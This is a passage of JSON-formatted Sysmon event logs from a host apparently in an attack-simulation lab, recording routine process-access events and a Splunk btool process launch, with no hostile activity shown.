06:51:50.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3840,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3841,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3842,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.496\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-001026A60500}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.496","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-001026A60500}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3843,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.514\r\nProcessGuid: {E2A3D6B1-1106-5F25-0000-0010E2A60500}\r\nProcessId: 4932\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1106-5F25-0000-001026A60500}\r\nParentProcessId: 4920\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.514","ProcessGuid":"{E2A3D6B1-1106-5F25-0000-0010E2A60500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1106-5F25-0000-001026A60500}","ParentProcessId":"4920","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3844,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-1106-5F25-0000-001026A60500}\r\nSourceProcessId: 4920\r\nSourceThreadId: 4916\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-0010E2A60500}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-1106-5F25-0000-001026A60500}","SourceProcessId":"4920","SourceThreadId":"4916","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-0010E2A60500}","TargetProcessId":"4932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3845,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-0010E2A60500}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-0010E2A60500}","TargetProcessId":"4932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3846,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3847,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3848,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.